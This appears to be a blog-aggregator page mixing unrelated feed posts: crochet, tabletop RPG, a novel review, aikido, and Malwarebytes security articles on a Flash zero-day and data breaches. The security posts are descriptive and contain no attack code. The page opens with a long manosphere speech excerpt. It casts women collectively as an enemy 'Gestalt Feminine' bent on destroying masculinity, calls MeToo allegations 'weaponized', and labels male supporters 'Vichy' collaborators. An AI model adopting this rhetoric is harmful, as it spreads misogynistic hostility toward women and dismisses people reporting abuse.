The Red Pill, the manosphere, saves lives in a literal sense. As my friend Pat Campbell has related, men are living today as a result of their having read my work and the works of others. The manosphere is a vital community that not only saves men’s lives, but it points them to a better one. The Red Pill is a set of tools for men to use to improve their lives. It is not a set of rules or a formula for guaranteed success. It is a map to follow while you make your own path as a man. It is concrete, evidence based, and always open for debate among the tribe that is the manosphere.

As the manosphere has evolved there have been various subsets of the community that have hived-off to form their own sub-tribes. I could probably devote entire talks to just these sub-groups. But the nature of men is tribal. Not to steal any thunder from Jack Donovan, but it is in men’s nature to form tribes and coalitions of like men. No matter what a certain misguided pop-psychologist would tell us about individualism, men evolved to be stronger within tribes. The manosphere itself is a tribe and within that tribe sub-tribes will establish themselves.

As I mentioned earlier, restricting men from gathering as a tribe, cutting those tribes off from communicating, is one way a gynocentric social order exercises control over the Gestalt Masculine. If you’ve ever wondered why it is that women feel an obsessive need to either join and assimilate, or outright destroy male-exclusive (Male Space) organizations while insisting on the gender-exclusivity of their own, look no further than their instinctive, base understanding of male tribalism. Together we grow stronger, we test each other, we form pacts and coalitions, we collaborate in ways that challenge what I call the Feminine Imperative. And the largest gestalt of that Feminine Imperative is now what we refer to as the Gynocracy.

In the beginning of the Red Pill, in the beginning of what’s now the manosphere, the Gestalt of masculinity, was beneath the notice of our feminine-primary social order. 

We were – and sometimes still are – “those small-dick losers who don’t know how women work”. We were dismissed as Incels (now re-popularized), misogynists, neck-beards, or “dude-bros”. It was the convenient ridicule stage. And that was made all the easier by the decades of masculine ridicule in sit-com deliberate misunderstandings about masculinity that began in the early 70s.

Now things have changed. 

The manosphere has evolved into something that’s much more of a threat to the Gynocracy. Once Trump defeated Hillary, the stakes were raised. I’m not here to debate politics, but the gender landscape has undeniably, unignorably, altered in the two years since a hyper-masculinized man put down the bid of a hyper-gynocentrist female-supremacist woman for the presidency she believed she was entitled to. We didn’t witness Trump defeat Hillary, we witnessed HIM defeat HER. The Gestalt Masculine prevailed over the sure-thing, “her turn” presumed victory of the Gestalt Feminine.

Gender Warfare

Do you understand what I’m saying? 

This was the first test in a larger gender war that was to come. And make no mistake, we are in a gender war today. 

Granted, it is a cold-war at this stage, but the Gestalt Masculine is at war with the gestalt feminine today. Both those gestalts found their perfect embodiment respectively in Trump and Hillary. This defeat gave rise to what is called the #resistance. The ‘resistance’ is another name for the Gestalt Feminine; replete with “allies” (Vichy Male collaborators), sloganeering (The Future is Female) and uniforms (Pink Pussy Hats).

You can witness this resistance, the Gestalt Feminine, in every Women’s March, in every face wearing a pink pussy hat, in every ludicrous new, weaponized, MeToo allegation that strips men of their basic civil rights not in a court of law, but in the court of social media. 

There are more manifestations of this Gestalt Feminine than I have time to list in this talk, but each has the express purpose of destroying conventional masculinity. It is no longer enough to inconvenience men or to spray paint “smash the patriarchy” on a stall in the women’s bathroom. The true intent is now unmasked, and that is the systematic removal of ALL masculinity.

“Men need to be actively disadvantaged for equality to be achieved” 

These were the words I read on a college chalkboard not too long ago. This is the sentiment that’s become normalized. This generation sees the advantage of a cover story like “equality” as if it were a nuisance today. They almost begrudgingly speak about equalism as if it’s the necessary wink and a nod before they move on to how justified the Gestalt Feminine is in disadvantaging men in the name of equality. But we’re expected to know that ‘achieving equality’ is the backstory to systematically removing men from all narratives. In a feminine-correct social order men should already know this is a facade, but go along with it anyway.

Today, we’re moving past the questions of whether or not the Gestalt Feminine should care about issues of equality of opportunity versus equality of outcome. That was a nice distraction, but making a distinction between the two is important, if only insofar as who you’re debating it with actually has the capacity to change their minds about anything. The Gestalt Feminine wants what it wants, like the sum total of all the Ids of women who believe in anything they’ve ever seen, heard or read about their own oppression.

Never in human history has there been such polarization between the sexes. In our contemporary gender landscape the Gestalt Male is the openly declared enemy of the Gestalt Female. And no one raises an eyebrow about it.

This isn’t how we would have it, because it’s my belief that the sexes are far better off as complements to the other. We can be, we have been, better together than adversarial of each other.

But any issue of gender conflict, any slight, any instance when a woman’s power may be challenged, any time a man might dare to raise a questioning awareness of an issue that is uniquely concerned with men is when the collective awareness of the Gestalt Feminine is roused into action.

I’ve called this phenomenon The Sisterhood Über Allesthe sisterhood above all other considerations. Before religion, before race, before political stripe, what benefits the Feminine Imperative is the prime directive of womankind.

As a result of continually feeding this beast we find ourselves in a state of sexual polarization that has gotten so bad that even “woke” male-feminists are now viewed as “stealth misogynists”. The stereotypical Nice Guy isn’t ‘nice’ anymore, he’s an operative that’s trying to fool women’s Hypergamous filters. The old trope of men getting in touch with one’s feminine side is now viewed with suspicion. Why would a man be motivated to identify with the feminine if not to use it to his manipulative advantage? Identifying with the female is almost more distrusted than openly Gaming women today.

You are never a ‘man’ to the resistance. To call you a man would be too old school patriarchal and aggrandizing. “Man” is reserved for the Alpha men women want to fuck. No, you are just an ‘ally’ and even then you’re only an ally so long as you remain useful. When that usefulness ceases, when you serve your purpose and look for approval from your mistress, when you hope to enjoy some reciprocal intimacy in return fo desired behavior, there’s now a new and much improved social convention ready made to remove you from the resistance.

My Twitter feed is littered with stories sent to me about infamous celebrity male-feminists who are now facing MeToo allegations. We don’t even call them misconduct allegation now – MeToo is synonymous with rape, harassment, even social missteps. 

To get “me too’d” is now a verb.

Segregation

The mistrust this war is engendering, is leading to a new form of gender segregation. In some orthodox churches it’s customary for the sexes to be separated in worship. Being the intelligent, evolved progressives we are, we call this segregation barbaric or demeaning of women. Yet MeToo is leading to a similar, more stringent form of segregation in our workplaces, in our social engagements and now even coming full circle back to the church. But this segregation isn’t about honoring old ways of religion, it’s based on distrust of women who now possess an immediate means to the personal destruction of men. 

So we cordon ourselves off from women for fear that we might say something that could be interpreted in an unintended way – not by a court of law, but the court of social media. We don’t fear the expense of an actual court case, we fear the far more expensive costs of having our bread, our reputations and our capacity to make a future living taken from us by the court of social media and the politics of wanton personal destruction.

These are some things I feel we need to wrap our heads around before I consider where the manosphere is going next. Because, in essence, this state, these conditions will guide this tribe into the future.

The mainstream is controlled by the Gestalt Feminine today. In our present gender Cold War that Gestalt is looking for a concrete enemy to fight. The Sisterhood Über Alles united behind blocking the nomination of Bret Kavanaugh recently and with that straw man enemy behind them they are now looking for a concrete enemy to unite against today. My fear, gentlemen, is that the manosphere will become the face of the enemy the resistance so desperately needs as a focus for its anger.

Lets face it, we’re the antithesis of what the Gestalt feminine would teach men they should be. We resist their unending efforts to contain conventional masculinity. We are the last line in keeping that male-defined masculinity viable. We’re an easy enemy to vent on, and the more we continue to grow, the more we will be that focus. The mainstream wants crazy and the manosphere is a made-for-TV villain that looks a lot like the people Women’s Studies professors tell their students it’s OK to hate.

How do we, the men of this tribe, define what we call the manosphere?

I’ve always made it a point to never directly involve myself in issues of politics, religion or race on The Rational Male. The only time I address such topics is when they cross over into issues of intersexual dynamics. Now I see just how much cross over there really is.

They say everything is about sex except sex; sex is about power. Think about that in the context of today’s gender Cold War.

If we do not define the manosphere it will certainly be defined for us by others who only see it as a niche market to exploit. The manosphere will fall prey to the Brand of Me. The Success Porn gurus, the Cassie Jayes, the Purple Pill Life Coaches, the Men’s Rights Movement – even Vichy male organizations like The Good Man Project or We Are Man Enough will claim an authority over the manosphere that they’ve never merited all in order to build their own brands.

And I’ll leave you with this as a primer for the rest of my State of the Manosphere talk I delivered at the 21 Convention, October 12th, 2018.

Categories: Miscellaneous Blogs

Moogly CAL 2018 – Afghan Block #24

Moogly - Thu, 12/06/2018 - 16:00

Moogly CAL 2018 Block 24 is here – and it’s the last one for the year! Thank you to Linda Dean for designing our final square – read on for the link, and the final date for this year! Disclaimer: This post includes affiliate links; materials provided by Red Heart Yarns, Furls Crochet, and Chetnanigans. [...]

The post Moogly CAL 2018 – Afghan Block #24 appeared first on moogly. Please visit www.mooglyblog.com for this post. If you are viewing this on another site they have scraped the content from my website without permission. Thank you for your support.

3
Categories: Crochet Life

Evolving the Dread Crypt: Ch-ch-ch-ch-changes

Torchbearer RPG - Thu, 12/06/2018 - 14:00
Skogenby Barrow by Rebekah Bennington

Last week, I wrote about NPCs I’ve added to the village of Skogenby to help bring it to life. This week we’ll use those NPCs and some material already in The Dread Crypt of Skogenby to update the adventure as Haathor-Vash’s plans take shape.

Note: The rest of this post will contain spoilers for the adventure.

The idea here is to create the feeling of a dynamic world that changes around the PCs. Some of those changes will be in reaction to the players’ actions, but the rest will be the result of antagonists and other NPCs advancing their agendas.

As a GM, this should be a relatively straightforward process: Between adventures, take stock of what your various important characters are up to (including PCs’ family, friends, mentors and enemies) and determine whether they’ve advanced their agendas or not. If they have advanced their agendas, note the consequences. That’s it. Simple, right? Let’s take a look at Skogenby.

What We Know

To start, let’s review what we know:

  1. The villagers of Skogenby unwittingly disturbed an ancient tomb, awakening an angry spirit named Haathor-Vash. The spirit possessed Jora, granddaughter of the village gydja.
  2. The  need to recover her stolen grave goods drives Haathor-Vash. She also wants vengeance on anyone connected with the theft, though recovery takes precedence over vengeance, at least at first. Initially, the spirit wore Jora’s body and searched  the village for its stolen arm ring at night. It killed anyone it encountered along the way.
  3. The village has appealed to their lord, Lady Gry, to protect them, but she’s away. They’ve turned to the adventurers in desperation.
  4. Vigdis, gydja of the village, was prepared to perform a blood sacrifice to appease the disturbed spirit but hoped to find another way before that became necessary.
  5. Hakemunn Grim, the wealthiest landowner in the village, wanted the tomb sealed, abandoning Jora to her fate. He was working to convince other villagers to follow his lead.
  6. Johanna, Vigdis’s daughter and apprentice, was determined to get her daughter Jora back. She was working herself up to poison Hakemunn Grim before he could gather enough support for his plan to seal the tomb with Jora inside.
  7. The dwarf bandit Beronin and his band of outlaws are preying on people in the vicinity of Skogenby. They heard rumors of the newly found crypt and intended to investigate.
  8. Sigismund and his brother Baugi secretly moved some property markers several months ago, allowing the village to lay claim to land that actually belongs to Greve Jermod. They were counting on Lady Gry’s inattention to steal from Greve Jermod in her name and secure more land for themselves.
  9. Halvor, captain of Greve Jermod’s wardens, and his people were hunting Beronin and his bandits. While in the area he also planned to check the new fields cleared by the village, as they were quite close to the greve’s forest preserve.

Those were the various threads that were in play at the start of the adventure.

Before we dig in too deep, I should note that it’s only worth doing all this evolution prep if your players already had some information about the adventure already. Unless your players previously had some information about Skogenby’s tribulations, it’s not worth going through the work to change up the situation. Just start at the beginning.

In my case, the players had heard the following rumor, but decided to ignore it in favor of another adventure:

Some folk in Skogenby, the next village over, uncovered a strange barrow while clearing a field recently. They think some evil spirit has come out of it, and they’ve asked for Lady Gry’s help, but she’s away. Supposedly there’s a lot of treasure in the tomb.

Let’s go through the nine things we know and think about how they might have changed while the PCs were focused on other things. These are my answers; yours might go in a completely different direction. That’s good!

The Dead Have Risen

We can take items 1 and 2 together and assume the situation did not resolve itself without outside intervention. Haathor-Vash has not recovered her treasure and has continued to kill people. It’s fair to say that as the situation has continued, she has gotten more disturbed and vengeful. I think she’s also growing more powerful as she comes into her own, empowering the recently deceased to rise as undead themselves.

Haathor-Vash’s iinitial minions were the undead remnants of her servitors (the Tomb Guardians, Skeletal Honor Guards and Corpse Candles). The ones that have bodies are dressed in strange, ancient clothing and armor, nothing like what the people of today wear. But now more dead have begun to rise in Skogenby. Those slain personally by Haathor-Vash have become ghouls. Anyone slain by the ghouls has risen as a zombie. The ghouls and the zombies now roam the countryside in and around Skogenby. Their corpses are fresh (and still fleshed for the most part) and their clothing is contemporary.

Essentially, it’s as if you rolled a ‘disaster’ result on the Town Events table for Skogenby. The village is still there and some people have barricaded themselves inside their homes, but the village no longer functions as a town with respect to the Torchbearer rules. Some brave souls will have to drive out the undead scourge before Skogenby can be used as a town again.

Sadly, Jora was already in rough shape at the original beginning of the adventure because Haathor-Vash had not been letting her eat, drink or sleep. She will have died of neglect by this point and risen as a ghoul.

Getting to the crypt itself is now harder. Ghouls and zombies infest the countryside and are a great option for twists. Camps on this side of the Hrada River should now be considered dangerous.

Maybe There’s an Upside?

With regard to item 3, Lady Gry is still not available. But we’ll put some pressure on her: Many of the surviving people of Skogenby have fled to Asktoft1More about Asktoft here, the nearby location of Lady Gry’s manor, for refuge.

That’s going to put a huge strain on the people of Asktoft, but we can save those consequences for another evolution down the road. For now, the effects will mostly be cosmetic — lots of terrified and hungry people on the streets of Asktoft. Eventually, the undead scourge could have a cascading effect on the entire region, but we want to take that slowly. Let the players get accustomed to the new circumstances before tightening the screws.

All of this is terrible for the people of Skogenby and the people of Asktoft. At the same time, it might actually present an opportunity for the PCs. The more Lady Gry’s personal wealth and comfort are affected by the undead horde, the more she will appreciate any ne’er-do-wells and scoundrels that help her. If the PCs play their cards right, there’s now an opportunity to win Lady Gry’s patronage when she returns, or at least her friendship.

There Will Be Blood?

Item 4 is Vigdis. It’s safe to assume that she has accepted that she’s out of options. She’s ready to try a blood sacrifice to appease Haathor-Vash’s anger. Of course, any of the surviving people that were there when Jora entered the crypt are long since scattered.

For better or worse, Vigdis is now convinced that the only way to stop the undead scourge is to gather up those who were present when Jora first violated the crypt and sacrifice them to Haathor-Vash. To up the creepiness factor, I think there’s a tree in the center of the village where Vigdis regularly performed animal sacrifices on the village’s behalf. The sacrifices were hung from the tree’s branches and left to rot. The necrotic energies that now suffuse the village have animated the carcasses. This would mostly just be for color.

I don’t think Vigdis would have fled the village. Instead, she’s surrounded her hut with wards and can provide a safe haven for the PCs to camp in Skogenby if they manage to make common cause with her. If the PCs camp in Vigdis’s hut, don’t roll for camp events. It’s a safe camp. In addition, Vigdis can feed the party and can help with Alchemist and Healer tests. However, if a test is failed in camp, the following twist is now on the table: Undead break through the wards and assault the hut.

A Matter of Justice

We can take items 5 and 6 together. Johanna would have attempted to poison Hakemunn Grim but failed to kill him, at least immediately. He is terribly sick as a result of the poison. He and his family have fled to Asktoft and are now staying in the inn there. Johanna was reluctantly caught by the other villagers (Hakemunn Grim is an abrasive man at the best of times) and locked in a root cellar, where she was to be held until Lady Gry could try her. When most people fled Skogenby they forgot about her and left her there. She’s still alive, but in a bad way.

Rescuing Johanna would certainly win Vigdis’s favor, but Hakemunn Grim is also desperate to get a hold of her in the hopes he can force her to reveal the antidote to the poison that is slowly and painfully killing him. He could attempt to recruit adventurers who visit the tavern or inn in Asktoft.

A Thief in the Night

As for item 7, Beronin had initially planned to loot the crypt after he heard about it. He and his crew attempted to do so but he was possessed by Haathor-Vash as a replacement for Jora. His bandits were either killed or cowed.

As Beronin, Haathor-Vash is using the surviving bandits as living agents, sending them out to gather information about the world that she has awoken in. This mostly serves as fodder for a later evolution, but there’s potential to still use living bandits as antagonists for the PCs. The PCs might even encounter some in or near the crypt itself as they return to Haathor-Vash’s throne room occasionally to receive their orders. Some bandits may also be having pangs of conscience about working with undead things. They could be possible allies for the PCs if approached carefully.

Did I Do That?

Sigismund also fled to Asktoft, where he was hoping to get Lady Gry’s aid. He’s most concerned about his own skin, but he knows that Jermod’s wardens are in the area. He can’t let knowledge of his crime get out, especially now that an ancient undead menace has arisen as a result.

Sigismund would very much appreciate it if some enterprising souls could ensure that the wardens were all slain (by undead, right?) before they could leave Skogenby’s environs. He’d certainly reward anyone who could help him in that way. He’ll cagily approach the PCs if they visit the tavern in Asktoft.

In the Line of Duty

Finally, Halvor is determined to catch Beronin and his band. He doesn’t care about Skogenby’s fate—that’s Lady Gry’s problem—but he does care about any impact to the greve’s lands and holdings. He’ll make common cause with the PCs to put Beronin down and end the threat to the greve’s holdings. He’ll promise to put in a good word with the greve if the PCs can help him.

He’ll also reward them directly with treasure if they can provide evidence that the property markers were moved. He’ll use any such evidence against Lady Gry, even though Sigismund was responsible.

Thoughts?

So that’s how I would evolve Skogenby. What about you? What would you do differently? Do you have other techniques you use to make your campaign feel like a living, breathing world?


Categories: Tabletop Gaming Blogs

1250

Looking For Group - Thu, 12/06/2018 - 05:00

The post 1250 appeared first on Looking For Group.

Categories: Web Comics

Shadows of Undeath & Horror - Campaign Commentary on Frog God Games Rappan Athuk Mega Dungeon For Astonishing Swordsmen & Sorcerors of Hyperborea Set Up Part I

Swords & Stitchery - Thu, 12/06/2018 - 04:32
"The Granddaddy of All Dungeons Returns! Rappan Athuk, the legendary mega-dungeon by Frog God Games and Necromancer Games is nothing more and nothing less than a good, old–fashioned, First Edition dungeon crawl updated for the Pathfinder Roleplaying Game and the Swords & Wizardry rules. Very difficult, Rappan Athuk will truly strike fear into the hearts of the most stalwart adventurersNeedleshttp://www.blogger.com/profile/11243274667834930867noreply@blogger.com0
Categories: Tabletop Gaming Blogs

Fiction Review: 14

19th Level - Thu, 12/06/2018 - 02:33

This July I started a new job. Beyond the cool work, free food, and awesome headquarters, there's a ton of interesting social groups that meet physically and/or on Slack. One group I'm in is a reading group which has introduced me to fiction that is of interest to me but that I might not have otherwise read.

Earlier this year we read Peter Clines' 14. It is a book about a group of people in a very strange Las Angeles apartment building. The rent is very cheap but it's never advertised - people always hear about it via word of mouth. The apartments are weird and unique. One is always very cool - the same constant temperature, no matter what. Another has a kitchen where any light bulb is always extremely dim. Another has a layout where nothing is directly connected to a wall - power outlets are on the floor, kitchen counters are a few inches away from the walls, etc. And is is two stories tall for some reason.

Our main protagonist is Nate, a data entry temp (who has been at the same place for years) at some minor Hollywood trade magazine. Many of the other characters are odd - religious zealot, weird artist, recently divorced older dude who seems to be good at everything.

Published in 2012 it really evokes its time. It's at the tail end of the Great Recession, and none of the characters are well-off. Many work for some Hollywood-related industry, though none are actors.

Nate is obsessed with the weirdness of the building. He wants to understand why it is the way it is, who owns it, etc. He also really wants some purpose in his life. He hates his job. Uncovering the mystery of the building becomes that purpose. Others in the building join him, becoming a "Scooby gang".

I'm hesitant to give many more details, but it has a strong Lovecraftian influence, along with some strong doses of weird science - the Tesla seen in Atomic Robo and The Prestige would be right at home here. There is a lot of weirdness here. I'd call it "Lovecraft Lite" - I don't mean that in a bad way, rather a lot of weirdness, a lot of danger, some horrible fates and cosmic horror, but the possibility of something resembling a happy ending - for some of the characters.

I enjoyed reading this. Some people in my reading group compared it to Lost - I never really got into Lost so I can't speak to that. I was pleased that the mystery built up but much of it was explained as the book progressed. I was also able to predict some plot developments - areas where Clines dropped some hints beforehand. I also enjoyed his realization of Las Angeles - being a New Yorker originally and having been in the Boston area for over two decades now, I kinda consider anything west of the Hudson River to be "the west". But Clines' LA seemed real - not the glitzy Hollywood version, but the one in which many people live and work.
Categories: Tabletop Gaming Blogs

New Flash Player zero-day used against Russian facility

Malwarebytes - Wed, 12/05/2018 - 22:44

For the past couple of years, Office documents have largely replaced exploit kits as the primary malware delivery vector, giving threat actors the choice between social engineering lures and exploits or a combination of both.

While today’s malicious spam (malspam) heavily relies on macros and popular vulnerabilities (i.e. CVE-2017-11882), attackers can also resort to zero-days when trying to compromise a target of interest.

In separate blog posts, Gigamon and 360 Core Security reveal how a new zero-day (CVE-2018-15982) for the Flash Player (version 31.0.0.153 and earlier) was recently used in targeted attacks. Despite being a brand new vulnerability, Malwarebytes users were already protected against it thanks to our Anti-Exploit technology.

The Flash object is embedded into an Office document disguised as a questionnaire from a Moscow-based clinic.

A dot reveals an embedded (and hidden) ActiveX object

Since Flash usage in web browsers has been declining over the past few years, the preferred scenario is one where a Flash ActiveX control is embedded in an Office file. This is something we saw earlier this year with CVE-2018-4878 against South Korea.

360 Core Security identified the zero-day as a Use After Free vulnerability in a Flash package called com.adobe.tvsdk.mediacore.metadata.

ActionScript view of the malicious SWF exploit. Thanks David Ledbetter for sharing the dumped file.

Victims open the booby-trapped document from a WinRAR archive that also contains a bogus jpeg file (shellcode) that will be used as part of the exploitation process that eventually loads a backdoor.

Exploitation flow showing the processes involved in the attack

As Qihoo 360 security researchers noted, the timing with this zero-day attack is close to a recent real-world incident between Russia and Ukraine. Cyberattacks between the two countries have been going on for years and have affected major infrastructure, such as the power grid

Malwarebytes users were already protected against this zero-day without the need to update any signatures. We detect the malware payload as Trojan.CrisisHT.APT.

Zero-day attack flow stopped by Malwarebytes

Adobe has patched this vulnerability (security bulletin APSB18-42) and it is highly recommended to apply this patch if you are still using Flash Player. Following the typical exploit-patch cycle, zero-days often become mainstream once other attackers get their hands on the code. For this reason, we can expect to see this exploit integrated into document exploit kits as well as web exploit kits in the near future.

The post New Flash Player zero-day used against Russian facility appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Six Gun Sound - 1st Night in Devil's Elbow

Two Hour Wargames - Wed, 12/05/2018 - 21:55

Maybe you’re an Outlaw looking for a place to lay low. Or maybe you’re a Mountain Man, Cowboy, or Gambler running from the law, or someone else. No questions asked and no questions answered. We don’t judge you here in Devil’s Elbow and you better not judge us. ************Devil’s Elbow is a tucked away place in the mountains of New Mexico.


Billy Pink (Rep 5 Star Jack of All Trades) has just entered Devil's Elbow for the first time. I decide to go to the Golden Lady Saloon. Devil's Elbow has 7 buildings to choose from and each has a number of PEFs (Possible Enemy Force) to be resolved, based on the Day Part - Daytime or Nighttime. It's Nighttime so there's 5. The first one in the Golden Lady is always Kat Dushae, the owner. There are 5 different Non-Player Characters in Devil's Elbow, each with a Special Ability. I won't go into detail about Kat, but it's a good idea to Sweet Talk her.


I roll for the second PEF and score Townsfolk and Gambler. Billy interacts with them and gains a favorable result so gains 1 Increasing Rep d6. That makes 2 as Kat gave Billy a favorable Interaction result, but Billy has done some Sweet Talking so he's even right now.


 3rd PEF resolved as a Gunslinger and an Outlaw - sometimes one in the same. Billy scores a favorable result interacting, then in Further Interaction, he gets a job offer. "Interested in maybe robbing a bank?" Billy thinks about it, but declines. "I'd be bad news for you guys. There's a lot of folks looking for me right now."


 4th PEF - Billy meets another Townsfolk and interacts, buys him a drink. Gains another favorable interaction, so at 4 total Increasing Rep d6. Here's where I double dip - I go back to the Gambler and for the 5th PEF I decide to gamble.


Here's a quick rundown on Gambling.
1 - Roll to see who is playing. I score 4 - one being my Star.
2 - Who are they?
Rep 5 Billy will play against a Rep 4 Outlaw, a Rep 3 Townsfolk and a Rep 5 Gambler. Uh oh!
3 - All players roll 2d6 versus current Rep. Pass 2, stay on the game, pass 1d6 and drop Rep by  1 point, pass 0d6 and you're out - gain Deceasing d6 equal to the number of players, including yourself.

1st Round - Townsfolk drops to Rep 2. Gambler cheated but wasn't caught.
2nd Round - Outlaw drops to Rep 3, Townsfolk to Rep 1. Gambler cheated, Billy caught him - I choose to not do anything yet, Townsfolk caught him as well, but chooses to leave the game.
3rd Round - Outlaw drops out of game, Gambler drops one Rep to 4.
4th Round - Gamblers drops out, Billy wins and gains 4 Increasing Rep d6.

I decide to leave, but...


I roll for Hard Feelings from those that lost in the game and as Billy leaves, the Gambler and an NPC friend follow Billy out the door.


The duo confront Billy outside -  Part Two Confrontation!
Categories: Tabletop Gaming Blogs

Breaches, breaches everywhere, it must be the season

Malwarebytes - Wed, 12/05/2018 - 19:57

After last weeks shocker from Marriott this week started off with disclosures about breaches at Quora, Dunkin’ Donuts, and 1-800-Flowers.

Quora

Quora is an online community that focuses on asking and answering questions. It was founded in 2009 by two former Facebook employees.

The stolen data may concern up to 100 million users of the platform and included the username, the email address, and the encrypted password. In some cases, imported data from other social networks and private messages on the platform may have been taken as well.

To counter future abuse of the login credentials we would advise Quora users to change their password and make sure that the combination of credentials they used on Quora aren’t used elsewhere. Even though Quora used encryption and salted the passwords, it is not prudent to assume nobody will be able to decrypt them. For those that are in the habit of re-using passwords across different sites, please read: Why you don’t need 27 different passwords.

For those who no longer want to be registered at Quora, we also advise you to check under Settings and Disconnect any and all Connected Accounts.

Quora’s official statement can be checked for further details and updates.

Dunkin’ Donuts

A threat-actor successfully managed to gain access to Dunkin’ Donuts Perks accounts. The Perks accounts is a run-of-the-mill loyalty reward system. Dunkin’ Donuts claims that there was no breach into their systems but that re-used passwords were to blame.

we’ve been informed that third parties obtained usernames and passwords through other companies’ security breaches and used this information to log into some Dunkin’ DD Perks accounts.

As a countermeasure they forced password resets for all the customers the company believes were affected. If you are one of these customers the threat actors could have learned your first and last names, email addresses, 16-digit DD Perks account numbers, and DD Perks QR codes.

I repeat myself: For those that are in the habit of re-using passwords across different sites, please read: Why you don’t need 27 different passwords.

1-800-flowers

The Canadian online outpost of the floral and gourmet foods gift retailer reported an incident where a threat-actor may have gained access to customer data from 75,000 Canadian orders, including names and credit card information, over a four-year period. Even though the breach did not impact any customers on its U.S. website, 1-800-Flowers.com, the company has filed a notice with the attorney general’s office in California.

The stolen payment information seems to include credit card numbers and all the related information: names, expiration dates, and security codes. That’s really all any seasoned criminal needs to plunder your account.

Are you afraid to be a victim of this breach, here’s what you can do to prevent further damage:

  • Review your banking and credit card accounts for suspicious activity.
  • Consider a credit freeze if you’re concerned your financial information was compromised.
  • Watch out for breach-related scams; cybercriminals know this is a massive, newsworthy breach so they will pounce at the chance to ensnare users through social engineering

Or download our Data Breach Checklist here.

Is it the season?

Some of the recent breaches happened quite some time ago or have been ongoing for years, so why are they all telling us now?

Possible reasons:

  • New legislation requires companies to report breaches
  • Breaches happen all the time, but these happen to be some very serious or big ones, so the media talks about them
  • When a big breach is aired you will always see a few smaller ones, trying to hide in their shadow
If you’re a business looking for tips to prevent getting hit by a breach:
  • Invest in an endpoint protection product and data loss prevention program to make sure alerts on similar attacks get to your security staff as quickly as possible.
  • Take a hard look at your asset management program:
    • Do you have 100 percent accounting of all of your external facing assets?
    • Do you have uniform user profiles across your business for all use cases?
  • When it comes to lateral movement after an initial breach, you can’t catch what you can’t see. The first step to a better security posture is to know what you have to work with.

In a world where it seems breaches cannot be contained, consumers and businesses once again have to contend with the aftermath. Our advice to organizations: Don’t become a cautionary tale. Save your customers hassle and save your business’ reputation by taking proactive steps to secure your company today.

The post Breaches, breaches everywhere, it must be the season appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Yarn Love: Red Heart Hygge Charm

Moogly - Wed, 12/05/2018 - 15:59

Red Heart Hygge Charm is “light as air brushed yarn with an added strand of matching metallic” – and it’s absolutely gorgeous! Let’s take a closer look at Hygge Charm in this month’s Moogly Yarn Love yarn review! Disclaimer: This post was sponsored by Red Heart Yarn, but all opinions are my own. This post [...]

The post Yarn Love: Red Heart Hygge Charm appeared first on moogly. Please visit www.mooglyblog.com for this post. If you are viewing this on another site they have scraped the content from my website without permission. Thank you for your support.

0
Categories: Crochet Life

How to Become a World Class Aikidoka!

Aikido Blogs - Wed, 12/05/2018 - 13:36
So, you think you need natural ability or talent to get good at Aikido.....think again! Geoff Colvin wrote a book called, "Talent is Overrated: What Really Separates World-Class Performers from Everybody Else."

It's a great read and very inspiring, well, to a certain degree...don't think it's easy to become great. There are two main ingredients to becoming great and two things that are going to help you get there.

Watch my vlog to learn more about what you need to become a world class Aikidoka!

click on the thumbnail below, or you can click on this text....
Categories: Aikido

New ‘Under the Radar’ report examines modern threats and future technologies

Malwarebytes - Wed, 12/05/2018 - 13:01

As if you haven’t heard it enough from us, the threat landscape is changing. It’s always changing, and usually not for the better.

The new malware we see being developed and deployed in the wild have features and techniques that allow them to go beyond what they were originally able to do, either for the purpose of additional infection or evasion of detection.

To that end, we decided to take a look at a few of these threats and pick apart what about them makes them difficult to detect, remaining just out of sight and able to silently spread across an organization.

 Download: Under the Radar: The Future of Undetected Malware

We then examine what technologies are unprepared for these threats, which modern tech is actually effective against these new threats, and finally, where the evolution of these threats might eventually lead.

The threats we discuss:

  • Emotet
  • TrickBot
  • Sorebrect
  • SamSam
  • PowerShell, as an attack vector

While discussing these threats, we also look at where they are most commonly found in the US, APAC, and EMEA regions.

Emotet 2018 detections in the United States

In doing so, we discovered interesting trends that create new questions, some of which are clear and others that need more digging. Regardless, it is evident that these threats are not old hat, but rather making bigger and bigger splashes as the year goes on, in interesting and sometimes unexpected ways.

Sorebrect ransomware detections in APAC region

Though the spread and capabilities of future threats are unknown, we have to prepare people to protect their data and experiences online. Unfortunately, many older security solutions will not be able to combat future threats, let alone what is out there now.

Not all is bad news in security, though, as we do have a lot going for us as in technological developments and innovations in modern features. For example:

  • Behavioral detection
  • Blocking at delivery
  • Self-defense modes

These features are effective at combating today’s threats and will soon be needed to build the basis for future developments, such as:

  • Artificial Intelligence being used to develop, distribute, or control malware
  • The continued development of fileless and “invisible” malware
  • Businesses becoming worm food for future malware
Download: Under the Radar: The Future of Undetected Malware

The post New ‘Under the Radar’ report examines modern threats and future technologies appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Pages

Subscribe to Furiously Eclectic People aggregator